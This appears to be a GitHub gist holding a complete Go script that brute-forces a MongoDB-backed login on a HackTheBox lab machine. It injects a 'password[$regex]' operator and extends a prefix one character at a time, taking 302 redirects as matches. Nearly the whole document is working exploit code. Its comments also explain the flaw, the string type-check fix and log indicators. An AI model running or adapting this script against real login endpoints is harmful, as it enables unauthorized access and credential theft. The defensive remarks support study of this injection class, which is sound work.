@daehee daehee/main.go
Created Nov 26, 2019

Bruteforce MongoDB Credentials with Regex Match Payload
package main
import (
"fmt"
"net/http"
"net/url"
"strings"
)
// buildPrintable returns the candidate alphabet as a rune slice: the digits
// 0-9, then A-Z, then a-z, then a fixed run of punctuation. The author's
// stated intent is to leave out special characters that would break the
// regex the payload is embedded in.
//
// The punctuation run is appended exactly as written, so '>' and '@' each
// occur twice in the result.
func buildPrintable() []rune {
	const punctuation = "~>][<>!@#%^()@_{}"
	spans := [][2]rune{{'0', '9'}, {'A', 'Z'}, {'a', 'z'}}

	var alphabet []rune
	for _, span := range spans {
		for r := span[0]; r <= span[1]; r++ {
			alphabet = append(alphabet, r)
		}
	}
	return append(alphabet, []rune(punctuation)...)
}
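// makePostRequest POSTs data, an already URL-encoded form body, to the
// hard-coded endpoint and returns the HTTP status code of the response.
// Redirects are not followed, so a 3xx answer is returned as-is rather than
// being replaced by the status of the redirect target.
//
// Any failure to build or send the request panics.
func makePostRequest(data string) int {
	const endpoint = "http://staging-order.mango.htb"

	req, err := http.NewRequest(http.MethodPost, endpoint, strings.NewReader(data))
	if err != nil {
		// Previously this error was ignored, and a failed NewRequest would
		// have surfaced as a nil-pointer dereference on the header write.
		panic(err)
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")

	client := &http.Client{
		// ErrUseLastResponse makes Do hand back the redirect response itself
		// instead of following it.
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}

	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	return resp.StatusCode
}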
// buildPostData returns the URL-encoded form body for one guess: a
// "username" field holding victim and a "password[$regex]" field holding
// payload followed by ".*".
//
// The bracketed key is what the request depends on. A server that expands
// bracketed form keys into nested values and passes them into a MongoDB
// query without type-checking would evaluate $regex as a query operator
// instead of comparing a string (presumably what the target does; that code
// is not visible here). Requiring both fields to be plain strings before the
// query is built closes this, and form keys containing "[$" in request logs
// are the indicator to look for.
func buildPostData(victim, payload string) string {
	form := url.Values{
		"username":         {victim},
		"password[$regex]": {payload + ".*"},
	}
	return form.Encode()
}
// main runs the guessing loop for the fixed username "admin".
//
// Each character of the alphabet is taken in turn as a starting prefix. The
// prefix is then extended one character at a time: every alphabet character
// is appended and sent as a guess, and a 302 status is treated as a match,
// at which point the guess is printed and becomes the new prefix. The sweep
// carries on through the rest of the alphabet with that longer prefix, and
// is repeated until a full sweep produces no match.
//
// Every guess is a separate POST for the same username, so on the server
// side this appears as a long, sequential burst of login requests.
func main() {
	alphabet := buildPrintable()
	victim := "admin"
	fmt.Printf("[*] Bruteforcing password for: %s\n", victim)

	for _, first := range alphabet {
		prefix := string(first)
		for {
			grew := false
			for _, next := range alphabet {
				candidate := prefix + string(next)
				if makePostRequest(buildPostData(victim, candidate)) != 302 {
					continue
				}
				fmt.Println(candidate)
				prefix = candidate
				grew = true
			}
			// Stop extending this prefix once a whole sweep found nothing.
			if !grew {
				break
			}
		}
	}
}